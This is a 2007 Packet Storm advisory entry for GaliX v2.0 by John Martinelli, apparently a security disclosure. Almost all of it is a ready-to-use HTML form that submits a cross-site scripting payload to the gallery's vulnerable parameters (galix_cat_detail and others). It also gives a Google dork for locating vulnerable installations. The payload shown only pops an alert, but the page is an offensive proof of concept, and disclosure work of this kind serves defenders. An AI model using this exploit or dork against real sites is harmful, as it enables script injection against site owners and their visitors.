galix.txt

2007-04-19T00:00:00
ID PACKETSTORM:56078
Type packetstorm
Reporter John Martinelli
Modified 2007-04-19T00:00:00

Description

                                        
                                            `<!--  
  
GaliX² v2.0 - Cross-Site Scripting Exploit  
  
Multiple Vulnerable Variables: galix_cat_detail_sort, galix_cat_detail, galix_gal_detail, galix_cat_detail  
Vulnerable: Galix v2.0 (other versions should also be vulnerable)  
Google d0rk: "GaliX² v2.0"  
  
John Martinelli  
john@martinelli.com  
http://john-martinelli.com  
  
April 18th, 2007  
  
!-->  
  
<html>  
<head><title>GaliX² v2.0 - Cross-Site Scripting Exploit</title><body>  
  
<center><br><br><font size=4>GaliX² v2.0 - Cross-Site Scripting Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?hl=en&q=GaliX%C2%B2+v2.0">"GaliX² v2.0"</a></font><br>  
  
<br><br>  
<form action="http://www.example.com/path/index.php" method="post">  
<input name="galix_action" type="hidden" value="galery">  
<input name="galix_cat_detail" size=75 value="<"<<script>alert(1);</script>">  
<input name="galix_cat_detail_sort" type="hidden" value="1">  
<input name="galix_language_change" type="hidden" value="1">  
<input type=submit value="Execute XSS Attack" class="button">  
</form>  
  
</body></html>`